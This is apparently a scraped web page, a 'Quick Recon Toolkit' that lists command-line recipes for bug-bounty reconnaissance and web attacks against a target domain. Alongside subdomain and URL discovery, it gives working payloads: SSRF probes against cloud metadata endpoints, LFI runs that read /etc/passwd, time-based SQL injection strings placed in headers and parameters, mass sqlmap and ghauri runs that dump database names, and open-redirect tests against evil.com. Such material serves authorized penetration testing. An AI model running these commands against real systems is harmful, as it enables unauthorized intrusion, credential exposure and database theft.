Quick Recon Toolkit
All-in-one recon command generator — enter a domain, get every command you need.
Subdomain Enumeration
14Automated Enumeration
subfinder -d example.com -all -recursive -o subfinder.txt
Fast subdomain discovery using multiple data sources
Subfinderassetfinder --subs-only example.com > assetfinder.txt
Find domains and subdomains related to a given domain
Assetfinderfindomain -t example.com | tee findomain.txt
Cross-platform subdomain enumerator
Findomainamass enum -passive -d example.com | cut -d']' -f 2 | awk '{print $1}' | sort -u > amass.txtPassive subdomain enumeration using OSINT
Amass Passiveamass enum -active -d example.com | cut -d']' -f 2 | awk '{print $1}' | sort -u > amass.txtActive subdomain enumeration with DNS resolution
Amass ActivePublic Sources
curl -s https://crt.sh/?q=example.com&output=json | jq -r '.[].name_value' | grep -Po '(\w+\.\w+\.\w+)$' > crtsh.txt
Extract subdomains from Certificate Transparency logs
Certificate Transparencycurl -s "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey" | sort | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u > wayback.txt
Discover subdomains from archived pages
Wayback Machinecurl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=[api-key]&domain=example.com" | jq -r '.domain_siblings[]' > virustotal.txt
Get domain siblings from VirusTotal
VirusTotalgithub-subdomains -d example.com -t [github_token]
Find subdomains in GitHub repositories
GitHub SubdomainsSubdomain Processing
cat *.txt | sort -u > final.txt
Combine all subdomain files and remove duplicates
Merge & Deduplicatesubfinder -d example.com | alterx | dnsx
Generate subdomain permutations and resolve them
Subdomain Permutationecho example.com | alterx -enrich | dnsx
Enrich domain with common patterns
Alterx Enrichmentecho example.com | alterx -pp word=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | dnsx
Use wordlist for subdomain permutation
Alterx with Wordlistffuf -u "https://FUZZ.example.com" -w wordlist.txt -mc 200,301,302
Brute force subdomains using FFUF
FFUF Subdomain BruteforceASN & IP Discovery
8ASN Mapping
asnmap -d example.com | dnsx -silent -resp-only
Discover IP addresses associated with domain's ASN
ASN Discoveryamass intel -org "organization_name"
Discover assets by organization name
Amass Intel by Organizationamass intel -active -cidr 159.69.129.82/32
Discover assets within IP range
Amass Intel by CIDRamass intel -active -asn [asnno]
Discover assets by ASN number
Amass Intel by ASNIP Harvesting
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?domain=example.com&apikey=[api-key]" | jq -r '.. | .ip_address? // empty' | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'Extract IP addresses from VirusTotal
VirusTotal IP Lookupcurl -s "https://otx.alienvault.com/api/v1/indicators/hostname/example.com/url_list?limit=500&page=1" | jq -r '.url_list[]?.result?.urlworker?.ip // empty' | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'Get IP addresses from AlienVault OTX
AlienVault OTXcurl -s "https://urlscan.io/api/v1/search/?q=domain:example.com&size=10000" | jq -r '.results[]?.page?.ip // empty' | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'Extract IP addresses from URLScan.io
URLScan.ioshodan search Ssl.cert.subject.CN:"example.com" 200 --fields ip_str | httpx-toolkit -sc -title -server -td
Find IP addresses using Shodan SSL certificate search
Shodan SSL SearchLive Host Discovery
5HTTP Probing
cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt
Probe for live hosts on multiple ports
HTTPX Basiccat subdomain.txt | httpx-toolkit -sc -title -server -td -ports 80,443,8080,8000,8888 -threads 200
Probe with detailed information extraction
HTTPX with Status CodesVisual Recon
cat hosts.txt | aquatone
Take screenshots of live hosts
Aquatone Basiccat hosts.txt | aquatone -ports 80,443,8000,8080,8443
Screenshot with custom port list
Aquatone Custom Portscat hosts.txt | aquatone -ports 80,81,443,591,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,8443,8834,8888
Screenshot with extended port range
Aquatone Extended PortsURL Collection & Analysis
8Active Crawling
katana -u livesubdomains.txt -d 2 -o urls.txt
Fast web crawler for URL discovery
Katanacat urls.txt | hakrawler -u > urls3.txt
Simple, fast web crawler
HakrawlerPassive Crawling
cat livesubdomains.txt | gau | sort -u > urls2.txt
Fetch known URLs from multiple sources
GAU (Get All URLs)urlfinder -d example.com | sort -u > urls3.txt
Find URLs from various sources
URLFinderecho example.com | gau --mc 200 | urldedupe > urls.txt
Get URLs with 200 status code and deduplicate
GAU with Status FilterParameter Extraction
cat allurls.txt | grep '=' | urldedupe | tee output.txt
Extract URLs containing parameters
Extract URLs with Parameterscat allurls.txt | grep -E '\?[^=]+=.+$' | tee output.txt
Extract URLs with parameter patterns
Parameter Pattern Matchingcat allurls.txt | gf sqli
Filter URLs potentially vulnerable to SQL injection
GF SQLi PatternVulnerability Scanning
3Nuclei Templates
nuclei -u https://example.com -bs 50 -c 30
Run Nuclei templates against single target
Nuclei Single Targetnuclei -l live_domains.txt -bs 50 -c 30
Run Nuclei templates against multiple targets
Nuclei Multiple Targetsnuclei -l live_domains.txt -s critical,high -bs 50 -c 30
Run only critical and high severity templates
Nuclei with Specific SeveritySensitive File Discovery
3File Extension Filtering
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"
Filter URLs for common sensitive file extensions
Basic Sensitive Filescat allurls.txt | grep -E "\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|7zip|p12|pem|key|crt|csr|sh|pl|py|java|class|jar|war|ear|sqlitedb|sqlite3|dbf|db3|accdb|mdb|sqlcipher|gitignore|env|ini|conf|properties|plist|cfg)$"
Extended regex for sensitive file discovery
Extended Sensitive Filessite:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
Google search for sensitive files
Google Dork for FilesHidden Parameter Discovery
2Arjun Parameter Discovery
arjun -u https://example.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
Passive parameter discovery using Arjun
Arjun Passive Discoveryarjun -u https://example.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
Active parameter discovery with wordlist
Arjun Active DiscoveryDirectory & File Bruteforcing
3Dirsearch
dirsearch -u https://example.com --full-url --deep-recursive -r
Basic directory and file discovery
Dirsearch Basicdirsearch -u https://example.com -e php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1
Extended directory bruteforcing with multiple extensions
Dirsearch ExtendedFFUF
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -t 10
FFUF directory discovery with recursion and multiple extensions
FFUF Directory DiscoveryWordPress Security Testing
1WPScan
wpscan --url https://example.com --disable-tls-checks --api-token YOUR_API_TOKEN -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force
Comprehensive WordPress security scan with aggressive plugin detection
WPScan Full EnumerationCORS Testing
5Manual CORS Testing
curl -H "Origin: http://evil.com" -I https://example.com/wp-json/
Test CORS configuration with custom origin
CORS Test with Curlcurl -H "Origin: http://evil.com" -I https://example.com/wp-json/ | grep -i -e "access-control-allow-origin" -e "access-control-allow-methods" -e "access-control-allow-credentials"
Analyze CORS headers in response
Detailed CORS AnalysisAutomated CORS Testing
cat subdomains.txt | httpx-toolkit -silent | nuclei -t nuclei-templates/vulnerabilities/cors/ -o cors_results.txt
Automated CORS vulnerability scanning with Nuclei
Nuclei CORS Testpython3 corsy.py -i subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"
Advanced CORS testing with Corsy
Corsy Toolpython3 CORScanner.py -u https://example.com -d -t 10
Comprehensive CORS vulnerability scanner
CORScannerSubdomain Takeover
1Subzy
subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl
Automated subdomain takeover detection with SSL verification
Subdomain Takeover DetectionGit Repository Disclosure
1Git Exposure Detection
cat domains.txt | grep "SUCCESS" | gf urls | httpx-toolkit -sc -server -cl -path "/.git/" -mc 200 -location -ms "Index of" -probe
Detect exposed .git directories and directory listings
Git Directory DiscoverySSRF Testing
5SSRF Parameter Discovery
cat urls.txt | grep -E 'url=|uri=|redirect=|next=|data=|path=|dest=|proxy=|file=|img=|out=|continue=' | sort -u
Identify URLs with SSRF-prone parameters
Find SSRF Parameterscat urls.txt | grep -i 'webhook\|callback\|upload\|fetch\|import\|api' | sort -u
Find API endpoints and webhook integrations
Find API/Webhook PatternsSSRF Testing
cat urls.txt | nuclei -t nuclei-templates/vulnerabilities/ssrf/
Automated SSRF vulnerability scanning
Nuclei SSRF Scancurl "https://example.com/page?url=http://127.0.0.1:80/"
Basic SSRF test to localhost
Basic SSRF Testcurl "https://example.com/api?endpoint=http://169.254.169.254/latest/meta-data/"
Test SSRF against cloud metadata services
Cloud Metadata SSRFOpen Redirect Testing
4Parameter Discovery
cat urls.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=" | tee redirect_params.txt
Extract URLs with redirect parameters
Find Redirect Parameterscat urls.txt | gf redirect | uro | sort -u | tee redirect_params.txt
Use GF patterns to find redirect parameters
GF Redirect PatternTesting
cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
Test redirect parameters with evil.com
Basic Open Redirect Testsubfinder -d example.com -all | httpx-toolkit -silent | gau | gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
Full pipeline for open redirect testing
Comprehensive Redirect TestLFI Testing
3LFI Discovery
echo "https://example.com/" | gau | gf lfi | uro | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | xargs -I{} ffuf -u {} -w payloads/lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -vLFI testing with FFUF and passwd file detection
Basic LFI Testgau example.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
LFI testing with curl and parallel processing
LFI with Curlecho 'https://example.com/index.php?page=' | httpx-toolkit -paths payloads/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
LFI testing with httpx-toolkit
HTTPx LFI TestAdditional Tools
7Content Type Filtering
echo example.com | gau | grep -Eo '(\/[^\/]+)\.(php|asp|aspx|jsp|jsf|cfm|pl|perl|cgi|htm|html)$' | httpx-toolkit -status-code -mc 200 -content-type | grep -E 'text/html|application/xhtml+xml'
Filter HTML content from discovered URLs
HTML Content Filteringecho example.com | gau | grep '\.js$' | httpx-toolkit -status-code -mc 200 -content-type | grep 'application/javascript'
Filter JavaScript files from discovered URLs
JavaScript Content FilteringMiscellaneous
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" file.txtExtract IP addresses from text files
Extract IP Addressescat urls.txt | grep -E ".php|.asp|.aspx|.jspx|.jsp" | grep '=' | sort > output.txt
Filter URLs for dynamic files with parameters
Filter Dynamic Filescat output.txt | sed 's/=.*/=/' > final.txt
Clean parameter values for fuzzing
Clean Parameterscat urls.txt | uro | sort -u > deduplicated_urls.txt
Remove duplicate URLs using URO
URO Deduplicationcat urls.txt | qsreplace "FUZZ" | sort -u > fuzz_urls.txt
Replace parameter values with FUZZ for testing
QSReplace Parameter TestingSQL Injection Methodology
22Endpoint Discovery
subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Single domain reconnaissance for potential SQL injectable endpoints
Single Domain SQLi Scansubfinder -d -l subdomains.txt -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Multiple subdomain reconnaissance for SQL injection testing
Multi-Subdomain SQLi Scanecho https://example.com | gau | uro | grep -E '.php|.asp|.aspx|.jspx|.jsp' | grep '='
Discover potential SQL injectable parameters using gau
GAU Parameter Discoveryecho https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E '.php|.asp|.aspx|.jspx|.jsp'
Alternative method for finding SQL injectable endpoints using katana
Katana SQLi Discoverysubfinder -d example.com -all -silent | gau --threads 50 | uro | gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
Mass SQL injection testing using ghauri
Mass Ghauri Testingsubfinder -d example.com -all -silent | gau | urldedupe | gf sqli >sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent
Comprehensive SQL injection testing using sqlmap
Mass SQLMap TestingHeader-Based Injection
curl -s -H 'User-Agent: 'XOR(if(now()=sysdate(),sleep(5),0))XOR' --url 'https://example.com'
Testing for time-based SQL injection via User-Agent header
User-Agent XOR Payloadcurl -s -H 'X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z' --url 'https://example.com'
Testing for time-based SQL injection via X-Forwarded-For header
X-Forwarded-For XOR Payloadcurl -s -H 'Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'' --url 'https://example.com'
Testing for time-based SQL injection via Referer header
Referer Sleep Payloadcurl -v -A 'Mozilla/5.0', (select*from(select(sleep(20)))a) # 'http://example.com'
Alternative User-Agent based SQL injection test
User-Agent Select Sleepcurl -H 'User-Agent: XOR(if(now()=sysdate(),sleep(5),0))XOR' -X GET 'https://example.com'
User-Agent header-based MySQL time-based injection
User-Agent MySQL Time-Basedcurl -H 'X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z' -X GET 'https://example.com'
X-Forwarded-For header-based MySQL time-based injection
XFF MySQL Time-Basedcurl -H 'Referer: https://example.com/'+(select*from(select(if(1=1,sleep(20),false)))a)+'' -X GET 'https://example.com'
Referer header-based MySQL time-based injection
Referer MySQL Time-BasedDatabase-Specific Payloads
SELECT dbms_pipe.receive_message(('a'),10) FROM dualOracle database time-based injection payload
Oracle Time-BasedWAITFOR DELAY '0:0:10'
Microsoft SQL Server time-based injection payload
MSSQL WAITFOR DELAYSELECT pg_sleep(10)
PostgreSQL time-based injection payload
PostgreSQL pg_sleepSELECT sleep(10)
MySQL time-based injection payload
MySQL sleepAdvanced Payloads
0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
MySQL alternative time-based payload with URL encoding
MySQL URL Encoded XOR'OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < '0:0:1') THEN (SELECT '1'||PG_SLEEP(10)) ELSE '0' END)='1
PostgreSQL complex time-based injection payload
PostgreSQL Complex Time-Basedif(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR''XOR(if(now()=sysdate(),sleep(10),0))OR'*/
MySQL multi-condition time-based payload with comment bypass
MySQL Multi-Condition Comment1234 AND SLEEP(10)';WAITFOR DELAY '00:00:05';--
Combined MySQL and MSSQL time-based payload
Combined MySQL+MSSQLparamname=1'-IF(1=1,SLEEP(10),0) AND paramname='1
Parameter-based MySQL time injection test
IF SLEEP Payload